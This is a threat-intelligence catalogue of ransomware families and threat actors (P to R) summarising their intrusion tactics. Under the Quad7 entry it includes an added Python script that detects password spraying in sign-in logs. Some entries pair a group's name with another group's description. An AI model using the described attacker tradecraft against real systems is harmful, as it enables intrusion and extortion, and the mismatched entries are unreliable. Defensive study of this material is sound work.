One actor that has emerged in this trend of human-operated attacks is an active, highly adaptive group that frequently drops Wadhrama as payload. PARINACOTA impacts three to four organizations every week and appears quite resourceful: during the 18 months that we have been monitoring it, we have observed the group change tactics to match its needs and use compromised machines for various purposes, including cryptocurrency mining, sending spam emails, or proxying for other attacks. The group’s goals and payloads have shifted over time, influenced by the type of compromised infrastructure, but in recent months they have mostly deployed the Wadhrama ransomware. The group most often employs a smash-and-grab method, whereby they attempt to infiltrate a machine in a network and proceed to the ransom stage in less than an hour. There are outlier campaigns in which they attempt reconnaissance and lateral movement, typically when they land on a machine and network that allows them to quickly and easily move throughout the environment. PARINACOTA typically brute-forces its way into servers that have Remote Desktop Protocol (RDP) exposed to the internet, with the goal of moving laterally inside a network or performing further brute-force activities against targets outside the network. This allows the group to expand the compromised infrastructure under their control. Frequently, the group targets built-in local administrator accounts or a list of common account names. In other instances, the group targets Active Directory (AD) accounts that they have compromised or have prior knowledge of, such as service accounts of known vendors. The group adopted the RDP brute-force technique that the older ransomware called Samas (also known as SamSam) infamously used. Other malware families like GandCrab, MegaCortex, LockerGoga, Hermes, and RobbinHood have also used this method in targeted ransomware attacks. PARINACOTA, however, has also been observed to adapt to any path of least resistance they can utilize. For instance, they sometimes discover unpatched systems and use disclosed vulnerabilities to gain initial access or elevate privileges.

PassCV

The PassCV group continues to be one of the most successful and active threat groups that leverage a wide array of stolen Authenticode-signing certificates. Snorre Fagerland of Blue Coat Systems first coined the term PassCV in a blog post. His post provides a good introduction to the group and covers some of the older infrastructure, stolen code-signing certificate reuse, and other connections associated with the PassCV malware. There are several clues alluding to the possibility that multiple groups may be utilizing the same stolen signing certificates, but at this time SPEAR believes the current attacks are more likely being perpetrated by a single group employing multiple publicly available Remote Administration Tools (RATs). The PassCV group has been operating with continued success and has already started to expand their malware repertoire into different off-the-shelf RATs and custom code. SPEAR identified eighteen previously undisclosed stolen Authenticode certificates. These certificates were originally issued to companies and individuals scattered across China, Taiwan, Korea, Europe, the United States and Russia. In this post we expand the usage of the term ‘PassCV’ to encompass the malware mentioned in the Blue Coat Systems report, as well as the APT group behind the larger C2 infrastructure and stolen Authenticode certificates. We’d like to share some of our findings as they pertain to the stolen certificates, command and control infrastructure, and some of the newer custom RATs they’ve begun development on.

PassLock

ransomware

Patched Lightning

Microsoft threat actor profile from the public naming mapping feed.

Patcher

Ransomware; targets macOS users.

Pay-or-Lost

ransomware

Pay2Decrypt

ransomware

PayDay Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all of the victim's files, including music, MS Office and Open Office documents, pictures, videos, shared online files, etc. The ransom is R$950, due within 5 days (R$ is a Brazilian currency). Based on Hidden Tear.

PayDOS Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All of the victim's files are compromised, including music, MS Office and Open Office documents, pictures, videos, shared online files, etc. Batch file; passcode: AES1014DW256 or RSA1014DJW2048.

PayForNature

ransomware

Payload

Payload is an active extortion or ransomware group tracked by RansomLook.

Payloadbin

Payloadbin is an active extortion or ransomware group tracked by RansomLook.

Paymen45

ransomware

Payment

ransomware

payoutsking

Payouts King Group. We are not RaaS. No affiliates are accepted. We use Tox messaging protocol.

PaySafeGen (German) Ransomware

This is most likely to affect German-speaking users, since the note is written in German. It mostly affects users in German-speaking countries. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All of the victim's files are compromised, including music, MS Office and Open Office documents, pictures, videos, shared online files, etc.

PayTool

PayTool is a threat actor that operates a phishing ecosystem focused on traffic violation and fine payment scams targeting Canadians through SMS-based social engineering. Their campaigns impersonate Canadian government traffic enforcement services, utilizing a federal-style "Traffic Ticket Search Portal" model that aggregates provincial fine payment portals. PayTool maintains a pool of generic domains to ensure continuity when specific provincial domains are blacklisted, exploiting brand trust with disposable domains. Recommendations include implementing DNS and web gateway controls to block newly registered domains and known PayTool-related IP ranges.

PClock and PClock2

ransomware

PClock3 Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All of the victim's files are compromised, including music, MS Office and Open Office documents, pictures, videos, shared online files, etc. CryptoLocker copycat.

PClock4 Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam (for example: “you have a criminal case against you”), fake updates, attachments and so on. It encrypts all of the victim's files, including music, MS Office and Open Office documents, pictures, videos, shared online files, etc.

pear

ABOUT US:

"Pure Extraction And Ransom (PEAR) Team is the community of highly responsible and strictly disciplined members. We are a private team and have nothing common with any other threat actors. We've been monitoring this field for a long-long time. So, we understand all the processes and know well how it all works."

Pearl Sleet

Pearl Sleet is a nation-state activity group based in North Korea that has been active since at least 2012. Its cyber espionage activities primarily target North Korean defectors and media organizations.

PEC 2017

ransomware

Pedcont

A new destructive ransomware called Pedcont claims to encrypt files because the victim has accessed illegal content on the deep web. The screen then goes blank and becomes unresponsive.

Pendor

ransomware

Pennywise

ransomware

People's Cyber Army of Russia

People's Cyber Army of Russia is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

People's Liberation Army Air Force

People's Liberation Army Air Force (PLAAF)

People's Liberation Army General Political Department

People's Liberation Army General Political Department (GND)

People's Liberation Army General Staff Department

People's Liberation Army General Staff Department (GSD)

PerSwaysion

PerSwaysion is a threat actor known for conducting phishing campaigns targeting high-level executives. They have been active since at least August 2019 and are believed to be based in Vietnam. PerSwaysion has recently updated their techniques, using more direct phishing methods and leveraging Microsoft 365 to steal credentials.

PetrWrap Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All of the victim's files are compromised, including music, MS Office and Open Office documents, pictures, videos, shared online files, etc.

Petya

Ransomware; encrypts disk partitions. PDFBewerbungsmappe.exe

PewCrypt +decrypt

ransomware

PewDiePie

ransomware

PewPew

ransomware

Phalcon

Phalcon is an active extortion or ransomware group tracked by RansomLook.

PhantomControl

PhantomControl is a sophisticated threat actor that emerged in November 2023. They utilize phishing emails as their initial infection vector and employ a ScreenConnect client to establish a connection for their malicious activities. Their arsenal includes a VBS script that hides its true intentions and reveals a complex mechanism involving PowerShell scripts and image-based data retrieval. PhantomControl has been associated with the Blind Eagle threat actors, showcasing their versatility and reach.

Philadelphia

Ransomware; coded by "The_Rainmaker".

Phlox Tempest

Phlox Tempest is a threat actor responsible for a large-scale click fraud campaign targeting users through YouTube comments and malicious ads. They use ChromeLoader to infect victims' computers with malware, often delivered as ISO image files that victims are tricked into downloading. The attackers aim to profit from clicks generated by malicious browser extensions or node-WebKit installed on the victim's device. Microsoft and other cybersecurity organizations have issued warnings about this ongoing and prevalent campaign.

Phobos Ransomware Actors

This object represents a collection of MITRE ATT&CK® Techniques and other objects (Software and/or Campaigns) related to the Phobos ransomware-as-a-service ("RaaS") operation.

Phobos

Phobos exploits open or poorly secured RDP ports to sneak inside networks and execute a ransomware attack, encrypting files and demanding a ransom be paid in bitcoin for returning the files, which in this case are locked with a .phobos extension.

PhobosImposter

ransomware

PhoneNumber

ransomware

PHP

ransomware

Pickaxe

Prying Libra, also known as Pickaxe, is a threat actor active since at least August 2017 that remains active to this day. The adversary's goal is to install and maintain a popular cryptocurrency miner on the victim's machine. The miner in question is an open-source tool named XMRig that generates the Monero cryptocurrency. Malware is delivered via downloads through the popular Adfly advertisement platform. Users are often misled into clicking on a malicious advertisement that results in the payload being delivered to the victim. Once installed, the malware leverages VBS scripts and redirection services, such as bitly, to ultimately download and execute XMRig. Over 15 million confirmed victims have been discovered to be infected in recent campaigns, with actual numbers likely to be between 30 and 45 million victims. The victims are found across the globe, with high concentrations in Thailand, Vietnam, Egypt, Indonesia, and Turkey.

PicklesRansomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All of the victim's files are compromised, including music, MS Office and Open Office documents, pictures, videos, shared online files, etc. Python ransomware.

PICO Ransomware

S!Ri found a new Thanatos Ransomware variant called PICO Ransomware. This ransomware will append the .PICO extension to encrypted files and drop a ransom note named README.txt.

PINCHY SPIDER

First observed in January 2018, GandCrab ransomware quickly began to proliferate and receive regular updates from its developer, PINCHY SPIDER, which over the course of the year established a RaaS operation with a dedicated set of affiliates. CrowdStrike Intelligence has recently observed PINCHY SPIDER affiliates deploying GandCrab ransomware in enterprise environments, using lateral movement techniques and tooling commonly associated with nation-state adversary groups and penetration testing teams. This change in tactics makes PINCHY SPIDER and its affiliates the latest eCrime adversaries to join the growing trend of targeted, low-volume/high-return ransomware deployments known as “big game hunting.” PINCHY SPIDER is the criminal group behind the development of the ransomware most commonly known as GandCrab, which has been active since January 2018. PINCHY SPIDER sells access to use GandCrab ransomware under a partnership program with a limited number of accounts. The program is operated with a 60-40 split in profits (60 percent to the customer), as is common among eCrime actors, but PINCHY SPIDER is also willing to negotiate up to a 70-30 split for “sophisticated” customers.

Pink Sandstorm

Agonizing Serpens is an Iranian-linked APT group that has been active since 2020. They are known for their destructive wiper and fake-ransomware attacks, primarily targeting Israeli organizations in the education and technology sectors. The group has strong connections to Iran's Ministry of Intelligence and Security and has been observed using various tools and techniques to bypass security measures. They aim to steal sensitive information, including PII and intellectual property, and inflict damage by wiping endpoints.

PirateJack Actor

"PirateJack" is a username used by a threat actor on underground cybercriminal forums. The actor has been observed attempting to sell numerous accesses to corporate networks mainly gained through compromise of VPN software.[[CYJAX Initial Access Broker Report June 2024](/references/5a20c423-c4c0-4601-9e4d-028df0297568)]

Piratelock

Piratelock is an active ransomware-as-a-service operation tracked by RansomLook.

Pirateware

ransomware

Pizhon

ransomware

PizzaCrypts

Ransomware

PIZZO SPIDER

PIZZO SPIDER is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

PL

ransomware

Planetary

First discovered by malware security analyst Lawrence Abrams, PLANETARY is an updated variant of another high-risk ransomware called HC7.

Play

Play is a ransomware group that has been active since at least 2022 deploying Playcrypt ransomware against the business, government, critical infrastructure, healthcare, and media sectors in North America, South America, and Europe. Play actors employ a double-extortion model, encrypting systems after exfiltrating data, and are presumed by security researchers to operate as a closed group. [CISA Play Ransomware Advisory December 2023](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-352a) [Trend Micro Ransomware Spotlight Play July 2023](https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-play)

Playboy

Playboy is an active extortion or ransomware group tracked by RansomLook.

PleaseRead Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all of the victim's files, including music, MS Office and Open Office documents, pictures, videos, shared online files, etc.

PLUMP SPIDER

A cybercriminal actor that uses voice phishing to gain access to compromise environments and initiate fraudulent transactions from victim payment systems.[[CrowdStrike 2025 Global Threat Report](/references/a69b0ce3-f314-4b32-bfb3-b1380c4f0ec4)]

PlushDaemon

PlushDaemon is a China-aligned APT group that has conducted cyberespionage operations against targets in China, Taiwan, Hong Kong, South Korea, the United States, and New Zealand. They executed a supply chain attack on the South Korean VPN provider IPany, compromising its installer to deploy the SlowStepper backdoor, which features a toolkit of over 30 components. PlushDaemon primarily gains initial access by hijacking legitimate updates of Chinese applications and has also exploited vulnerabilities in legitimate web servers. Additionally, they have utilized the Visual Studio command line utility regcap.exe to side-load a malicious DLL named lregdll.dll.

POISON CARP

Between November 2018 and May 2019, senior members of Tibetan groups received malicious links in individually tailored WhatsApp text exchanges with operators posing as NGO workers, journalists, and other fake personas. The links led to code designed to exploit web browser vulnerabilities to install spyware on iOS and Android devices, and in some cases to OAuth phishing pages. This campaign was carried out by what appears to be a single operator that we call POISON CARP.

PoisonFang

ransomware

PoisonSeed

PoisonSeed is a threat actor employing an MFA-resistant phishing kit to acquire credentials from individuals and organizations, primarily targeting email infrastructure for cryptocurrency-related spam. They utilize spear-phishing emails with malicious links, automate bulk downloading of email lists, and capture authentication cookies to bypass MFA. PoisonSeed has been linked to campaigns that exploit cross-device sign-in features and employ tactics such as cryptocurrency seed phrase poisoning. Their infrastructure includes domains registered through NICENIC and hosted on Cloudflare, with a focus on phishing CRM and bulk email provider credentials.

POISONUS PANDA

POISONUS PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Pojie

ransomware

PokemonGO

Ransomware; based on Hidden Tear.

Police Bureau of Investigation

Police Bureau of Investigation (PBI)

Political Security Directorate

Political Security Directorate

Political Security Organization

Political Security Organization (PSO)

Politiets sikkerhetstjeneste

Politiets sikkerhetstjeneste (PST) (Police Security Service)

Polski Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all of the victim's files, including music, MS Office and Open Office documents, pictures, videos, shared online files, etc. The ransom is $249, and the hacker demands that the victim get in contact through e-mail and a Polish messenger called Gadu-Gadu.

Polyglot

Ransomware; imitates CTB-Locker.

Polyvice

Polyvice is an active extortion or ransomware group tracked by RansomLook.

PonyFinal

ransomware

PooleZoor

ransomware

PopCorn Time Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all of the victim's files, including music, MS Office and Open Office documents, pictures, videos, shared online files, etc. These hackers claim to be students from Syria. This ransomware poses as the popular torrent movie screener called PopCorn. The criminals give the victim the chance to retrieve their files “for free” by spreading the virus to others, as shown in the note below: https://www.bleepstatic.com/images/news/ransomware/p/Popcorn-time/refer-a-friend.png

PopCornTime

ransomware

PornBlackmailer

A new infection is being distributed by porn sites that tries to blackmail the victim into paying a ransom by stating that it will tell law enforcement the victim is spreading child porn. This is done by collecting information about the user, including screenshots of their active desktop, in order to catch them in compromising situations.

Potato Ransomware

Demands a ransom to return the victim's files. The ransom note is in English; spread worldwide.

Povisomware

ransomware

PowerHentai

ransomware

PowerLocky

ransomware

PowerPool

Malware developers started using the zero-day exploit for the Task Scheduler component in Windows two days after proof-of-concept code for the vulnerability appeared online. A security researcher using the online name SandboxEscaper released, on August 27, source code exploiting a security bug in the Advanced Local Procedure Call (ALPC) interface used by Windows Task Scheduler. More specifically, the problem is in the SchRpcSetSecurity API function, which fails to properly check a user's permissions, allowing write access to files in C:\Windows\Tasks. The vulnerability affects Windows versions 7 through 10 and can be used by an attacker to escalate privileges to the SYSTEM account. A couple of days after the exploit code (source and binary) became available, malware researchers at ESET noticed its use in active malicious campaigns by a threat actor they call PowerPool, named for its tendency to use tools mostly written in PowerShell for lateral movement. The group appears to have a small number of victims in the following countries: Chile, Germany, India, the Philippines, Poland, Russia, the United Kingdom, the United States, and Ukraine. The researchers note that PowerPool's developers did not use the binary version of the exploit, instead making subtle changes to the source code before recompiling it.

PowerShell Locker 2013

ransomware

PowerShell Locker 2015

ransomware

PowerWare

Ransomware Open-sourced PowerShell

PowerWorm

Ransomware no decryption possible, throws key away, destroys the files

PPDDDP

ransomware

Pr0tector

ransomware

PREDATOR PANDA

PREDATOR PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Predator

ransomware

Predatory Sparrow

A self-proclaimed hacktivist group that carried out attacks against Iranian railway systems and against Iranian steel plants.

Priapos

ransomware

Princess Evolution

We have been observing a malvertising campaign via Rig exploit kit delivering a cryptocurrency-mining malware and the GandCrab ransomware since July 25. On August 1, we found Rig’s traffic stream dropping a then-unknown ransomware. Delving into this seemingly new ransomware, we checked its ransom payment page in the Tor network and saw it was called Princess Evolution (detected by Trend Micro as RANSOM_PRINCESSLOCKER.B), and was actually a new version of the Princess Locker ransomware that emerged in 2016. Based on its recent advertisement in underground forums, it appears that its operators are peddling Princess Evolution as a ransomware as a service (RaaS) and are looking for affiliates. The new malvertising campaign we observed since July 25 is notable in that the malvertisements included Coinhive (COINMINER_MALXMR.TIDBF). Even if users aren’t diverted to the exploit kit and infected with the ransomware, the cybercriminals can still earn illicit profit through cryptocurrency mining. Another characteristic of this new campaign is that they hosted their malvertisement page on a free web hosting service and used domain name system canonical name (DNS CNAME) to map their advertisement domain on a malicious webpage on the service.

Princess Locker

Ransomware

Prinz Eugen

Prinz Eugen is an active extortion or ransomware group tracked by RansomLook.

PRISM

Ransomware

ProCC

ProCC is a threat actor targeting the hospitality sector with remote access Trojan malware. They use email attachments to exploit vulnerabilities like CVE-2017-0199 and deploy customized versions of RATs such as RevengeRAT, NjRAT, NanoCoreRAT, and 888 RAT. ProCC's malware is capable of collecting data from the clipboard and printer spooler, as well as capturing screenshots on infected machines.

Project23

ransomware

Project34 Ransomware

This is most likely to affect English-speaking users, since the ransom note is written in English; as English is understood worldwide, anyone can be harmed. The attacker spreads the malware using email spam, fake updates and malicious attachments. All user files are affected, including music, MS Office and OpenOffice documents, pictures, videos and shared online files.

Project57

ransomware

ProjectSauron

ProjectSauron is the name for a top level modular cyber-espionage platform, designed to enable and manage long-term campaigns through stealthy survival mechanisms coupled with multiple exfiltration methods. Technical details show how attackers learned from other extremely advanced actors in order to avoid repeating their mistakes. As such, all artifacts are customized per given target, reducing their value as indicators of compromise for any other victim. Usually APT campaigns have a geographical nexus, aimed at extracting information within a specific region or from a given industry. That usually results in several infections in countries within that region, or in the targeted industry around the world. Interestingly, ProjectSauron seems to be dedicated to just a couple of countries, focused on collecting high value intelligence by compromising almost all key entities it could possibly reach within the target area. The name, ProjectSauron reflects the fact that the code authors refer to ‘Sauron’ in the Lua scripts.

Prolific Puma

Prolific Puma provides an underground link shortening service to criminals. Infoblox states that during analysis, no legitimate content was observed being served through their shortener. For operation they use a registered domain generation algorithm (RDGA), based upon which they registered between 35k-75k domain names.

ProLock

PwndLocker (later rebranded as ProLock) is a ransomware that was observed in late 2019 and is reported to have been used to target businesses and local governments/cities. According to one source, ransom amounts demanded as part of PwndLocker activity range from $175k USD to $650k USD depending on the size of the network. PwndLocker attempts to disable a variety of Windows services so that their data can be encrypted. Various processes are also targeted, such as web browsers and software related to security, backups, and databases. Shadow copies are cleared by the ransomware, and encryption of files occurs once the system has been prepared in this way. Executable files and those that are likely to be important for the system to continue to function appear to be skipped by the ransomware, and a large number of folders, mostly related to Microsoft Windows system files, are also ignored. As of March 2020, encrypted files have been observed with the added extensions .key and .pwnd. Ransom notes are dropped in folders where encrypted files are found and also on the user's desktop.

Prometey

ransomware

Prometheus

Ransomware written in .NET, apparently derived from the codebase of win.hakbit (Thanos) ransomware.

Prophet Spider

PROPHET SPIDER is an eCrime actor, active since at least May 2017, that primarily gains access to victims by compromising vulnerable web servers, which commonly involves leveraging a variety of publicly disclosed vulnerabilities. The adversary has likely functioned as an access broker — handing off access to a third party to deploy ransomware — in multiple instances.

ProposalCrypt Ransomware

It is directed at English-speaking users and can therefore infect victims worldwide. It is spread via email spam, fake updates, malicious attachments and similar lures. It encrypts all user files, including music, MS Office and OpenOffice documents, pictures, videos and shared online files. The ransom is 1.0 bitcoin.

Protected

ransomware

Proton

Proton is an active extortion or ransomware group tracked by RansomLook.

Providence

Providence is an active extortion or ransomware group tracked by RansomLook.

Proxima

Proxima is an active extortion or ransomware group tracked by RansomLook.

Ps2exe

Ransomware

PSCrypt

ransomware

PshCrypt

ransomware

PTP

ransomware

PUBG Ransomware

In what could only be a joke, a new ransomware has been discovered called "PUBG Ransomware" that will decrypt your files if you play the game called PlayerUnknown's Battlegrounds. Discovered by MalwareHunterTeam, when the PUBG Ransomware is launched it will encrypt a user's files and folders on the user's desktop and append the .PUBG extension to them. When it has finished encrypting the files, it will display a screen giving you two methods that you can use to decrypt the encrypted files.

Public Security Intelligence Agency

Public Security Intelligence Agency (PSIA)

PulpFictionQuote

ransomware

Pulpy

ransomware

Pump

ransomware

Punisher

Punisher is an active extortion or ransomware group tracked by RansomLook.

puNK-003

puNK-003 is a North Korean APT group known for deploying the Lilith RAT, a sophisticated C++ remote access trojan, and its AutoIt variant, CURKON, which functions as a downloader. The group primarily distributes malware through targeted phishing attacks using malicious LNK files. Analysis indicates that puNK-003 shares similarities with the KONNI group, particularly in the use of AutoIt scripts and specific coding functions. Key indicators of infection include unusual network activity and system slowdowns, with removal methods involving specialized antivirus software and manual techniques.

PureLocker

ransomware

PurpleHaze

PurpleHaze is a China-nexus threat actor tracked by SentinelLABS, linked to APT15, known for targeting critical infrastructure sectors such as telecommunications and government organizations. The actor has been associated with reconnaissance attempts against SentinelOne and has utilized ShadowPad, a modular backdoor platform, for cyberespionage and potential ransomware deployment. Investigations are ongoing to determine overlaps between ShadowPad intrusions and PurpleHaze activity, highlighting the extensive sharing of malware and operational practices among Chinese threat groups. The targeting of third-party service providers has raised significant concerns regarding operational security and supply chain monitoring.

PwndLocker

ransomware

PyL33T Ransomware

This is most likely to affect English-speaking users, since the ransom note is written in English; as English is understood worldwide, anyone can be harmed. The attacker spreads the malware using email spam, fake updates and malicious attachments. All user files are affected, including music, MS Office and OpenOffice documents, pictures, videos and shared online files.

Pyrx

Pyrx is an active extortion or ransomware group tracked by RansomLook.

PyteHole

ransomware

Python

ransomware

PZDC

ransomware

Qatar State Security

Qatar State Security

Qilin Ransomware Actors

An object to catalog the TTP and threat object relationships associated with actors known to deploy Qilin ransomware and variants.

Qilin Securotrop

Qilin Securotrop is an active extortion or ransomware group tracked by RansomLook.

Qilin

Qilin is a ransomware group that first appeared in 2022 but had a breakout year in 2024, with around 200 victims, 156 of them based in the U.S.

Qinynore

ransomware

Qiulong

Qiulong is an active extortion or ransomware group tracked by RansomLook.

qkG

Security researchers have discovered a new ransomware strain named qkG that targets only Office documents for encryption and infects the Word default document template to propagate to new Word documents opened through the same Office suite on the same computer.

Qlocker

login page, no posts

QNAPCrypt

ransomware

QP

ransomware

Quad7 Botnet Operators

7777 or Quad7 is a botnet used to compromise network devices such as TP-LINK small office/home office ("SOHO") routers and use the infected devices to relay password spraying attacks against Microsoft 365 accounts.[[Sekoia.io Blog July 23 2024](/references/ae84e72a-56b3-4dc4-b053-d3766764ac0d)][[Sekoia.io Blog September 9 2024](/references/eb4a1888-3b04-449b-9738-d96ae26adfee)] This object reflects the various Techniques observed in use by the threat actors known to operate this botnet.
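The Quad7 pattern above is a spray (one or two passwords against many accounts) relayed through many residential routers, so a detector keyed only on "many failures from one IP" misses it. The following is an added example, not code from the page or from Sekoia or Microsoft; it assumes a simplified sign-in export with the fields timestamp,src_ip,user,result, and the sample records are constructed. The first check flags individual sources that touch many accounts with few attempts each; the second ignores the source entirely and looks for the same signature across the whole tenant, which is what survives distribution over a botnet.

```python
"""Password-spray detection over constructed Microsoft 365 sign-in records.

Added example, not code from the page or from Sekoia/Microsoft. It assumes a
CSV-like export with the fields timestamp,src_ip,user,result; adapt the parser
to your own log schema.
"""
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Constructed sample sign-in events (not real data). Two sources each try one
# password against several accounts; a third hammers a single account.
SAMPLE_SIGNINS = """\
2024-07-01T08:00:01Z,203.0.113.10,alice@example.com,FAILURE
2024-07-01T08:00:07Z,203.0.113.10,bob@example.com,FAILURE
2024-07-01T08:00:13Z,203.0.113.10,carol@example.com,FAILURE
2024-07-01T08:00:19Z,203.0.113.10,dave@example.com,FAILURE
2024-07-01T08:00:25Z,203.0.113.10,erin@example.com,FAILURE
2024-07-01T08:00:31Z,203.0.113.10,frank@example.com,SUCCESS
2024-07-01T08:00:40Z,198.51.100.7,grace@example.com,FAILURE
2024-07-01T08:00:45Z,198.51.100.7,heidi@example.com,FAILURE
2024-07-01T08:01:02Z,198.51.100.7,ivan@example.com,FAILURE
2024-07-01T08:01:09Z,198.51.100.7,judy@example.com,FAILURE
2024-07-01T08:01:15Z,198.51.100.7,mallory@example.com,FAILURE
2024-07-01T09:30:00Z,192.0.2.55,alice@example.com,FAILURE
2024-07-01T09:30:05Z,192.0.2.55,alice@example.com,FAILURE
2024-07-01T09:30:10Z,192.0.2.55,alice@example.com,SUCCESS
"""


def parse_signins(text):
    """Parse one event per line into dicts, sorted by time (timestamps are UTC)."""
    events = []
    for line in text.strip().splitlines():
        ts, src_ip, user, result = line.split(",")
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc),
            "src_ip": src_ip,
            "user": user.lower(),
            "result": result,
        })
    return sorted(events, key=lambda e: e["ts"])


def _windows(events, window):
    """For each event as a window start, yield the events within [start, start + window)."""
    for i, start in enumerate(events):
        end = start["ts"] + window
        yield [e for e in events[i:] if e["ts"] < end]


def _low_count_users(win, max_per_user):
    """Accounts that failed at most max_per_user times inside the window.
    Many failures against one account is brute force, not a spray."""
    attempts = defaultdict(int)
    for e in win:
        attempts[e["user"]] += 1
    return sorted(u for u, n in attempts.items() if n <= max_per_user)


def spraying_sources(events, window=timedelta(minutes=10), min_users=5, max_per_user=2):
    """Map each source IP that sprays (>= min_users distinct accounts, each tried
    at most max_per_user times, inside one window) to the accounts it touched."""
    by_src = defaultdict(list)
    for e in events:
        if e["result"] == "FAILURE":
            by_src[e["src_ip"]].append(e)
    hits = {}
    for src, evs in by_src.items():
        for win in _windows(evs, window):
            users = _low_count_users(win, max_per_user)
            if len(users) >= min_users:
                hits[src] = sorted(set(hits.get(src, [])) | set(users))
    return hits


def distributed_spray(events, window=timedelta(minutes=10), min_users=8,
                      min_sources=2, max_per_user=2):
    """Source-agnostic variant for relay botnets such as Quad7: a spray split
    across many SOHO-router egress IPs still shows up as many distinct failing
    accounts per window. Returns the largest matching (users, sources) or None."""
    failures = [e for e in events if e["result"] == "FAILURE"]
    best = None
    for win in _windows(failures, window):
        users = _low_count_users(win, max_per_user)
        user_set = set(users)
        sources = sorted({e["src_ip"] for e in win if e["user"] in user_set})
        if len(users) >= min_users and len(sources) >= min_sources:
            if best is None or len(users) > len(best[0]):
                best = (users, sources)
    return best


if __name__ == "__main__":
    evs = parse_signins(SAMPLE_SIGNINS)
    for src, users in spraying_sources(evs).items():
        print(f"spray from {src}: {len(users)} accounts")
    hit = distributed_spray(evs)
    if hit:
        print(f"distributed spray: {len(hit[0])} accounts from {len(hit[1])} sources")
```

The thresholds are deliberately conservative defaults; in a real tenant they should be tuned against a baseline of normal failed-logon volume, and the source-agnostic check is the one worth alerting on when the egress IPs are residential.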

QuakeWay

ransomware

Quantum Ransomware Actors

This Group object reflects the tools & TTPs associated with threat actors known to deploy Quantum ransomware (aka Quantum Locker, which derives from the MountLocker, AstroLocker, and XingLocker ransomware families). The Quantum group is known to publicly extort its victims.[[Cybereason Quantum Ransomware May 9 2022](/references/19027620-216a-4921-8d78-f56377778a12)] Researchers indicate the group is a rebranding of the "Conti Team Two" that formed after the fragmenting of the Ryuk/Conti ransom group in early 2022.[[AdvIntel Bazar Call August 10 2022](/references/5d3dff70-28c2-42a5-bf58-211fe6491fd2)]

Quantum

Quantum is an active extortion or ransomware group tracked by RansomLook.

Quicklock

Quicklock is an active extortion or ransomware group tracked by RansomLook.

QUILTED TIGER

Dropping Elephant (also known as “Chinastrats” and “Patchwork“) is a relatively new threat actor that is targeting a variety of high profile diplomatic and economic targets using a custom set of attack tools. Its victims are all involved with China’s foreign relations in some way, and are generally caught through spear-phishing or watering hole attacks.

Quoter

Quoter is an active extortion or ransomware group tracked by RansomLook.

Qwerty Ransomware

A new ransomware has been discovered that utilizes the legitimate GnuPG (GPG) encryption program to encrypt a victim's files. Currently in the wild, this ransomware is called Qwerty Ransomware; it encrypts a victim's files, overwrites the originals, and appends the .qwerty extension to each encrypted file's name.

Qweuirtksd

ransomware

Qyick Ransomware

Ransomware

R

Ransomware

R00tK1T

R00TK1T is a hacking group known for sophisticated cyber attacks targeting governmental agencies in Malaysia, including data exfiltration from the National Population and Family Development Board. The group has publicized their successful attacks on social media, showcasing stolen data. R00TK1T has also targeted Malaysian telecom providers, defacing portals and potentially breaching user data.

R3store

ransomware

R980

Ransomware

Ra Group

Ra Group is an active extortion or ransomware group tracked by RansomLook.

Ra

ransomware

RAA encryptor

Ransomware Possible affiliation with Pony

Rabbit Hole

Rabbit Hole is an active extortion or ransomware group tracked by RansomLook.

RabbitFox

ransomware

Rabion

Ransomware RaaS Copy of Ranion RaaS

Radamant

Ransomware

Radar

Radar is an active extortion or ransomware group tracked by RansomLook.

Radiant Group

Radiant Group is an active extortion or ransomware group tracked by RansomLook.

RADIO PANDA

RADIO PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Ragnar Locker

Ragnar Locker is a ransomware identified in December 2019 that targets corporate networks in Big Game Hunting targeted attacks. This report presents recent elements regarding this ransomware.

Ragnarok

Ragnarok is a ransomware that targets corporate networks in Big Game Hunting targeted attacks. The ransomware is associated with the 'double-extortion' tactic: stealing files and publishing them on a data leak site (DLS).

RaHDit

RaHDit is a pro-Kremlin hacktivist group known for orchestrating hack-and-leak operations, including the publication of personal information about Ukrainian military intelligence personnel and their associates. The group has been linked to Russian intelligence and has claimed to provide actionable intelligence to the Russian army. RaHDit operates a website called NemeZida, where they disclose sensitive data, and has been involved in disinformation campaigns supporting Russian narratives. Their activities include collaboration with other hacktivist groups and targeting Ukrainian cyberdefense efforts.

Rakhni

Ransomware Files might be partially encrypted

Ramp

Ramp is an active extortion or ransomware group tracked by RansomLook.

Ramsey

ransomware

Ramsomeer

Ransomware Based on the DUMB ransomware

Rancoz

Rancoz is an active extortion or ransomware group tracked by RansomLook.

Random30

ransomware

RandomLocker

ransomware

Ranion RaaS Ransomware

It is directed at English-speaking users and can therefore infect victims worldwide. It is spread via email spam, fake updates, malicious attachments and similar lures. It encrypts all user files, including music, MS Office and OpenOffice documents, pictures, videos and shared online files. Ranion RaaS is a ransomware-as-a-service offering that lets ordinary people buy and distribute ransomware for a very low price.

Ranion

Ranion is an active ransomware-as-a-service operation tracked by RansomLook.

Rannoh

Ransomware

RanRan
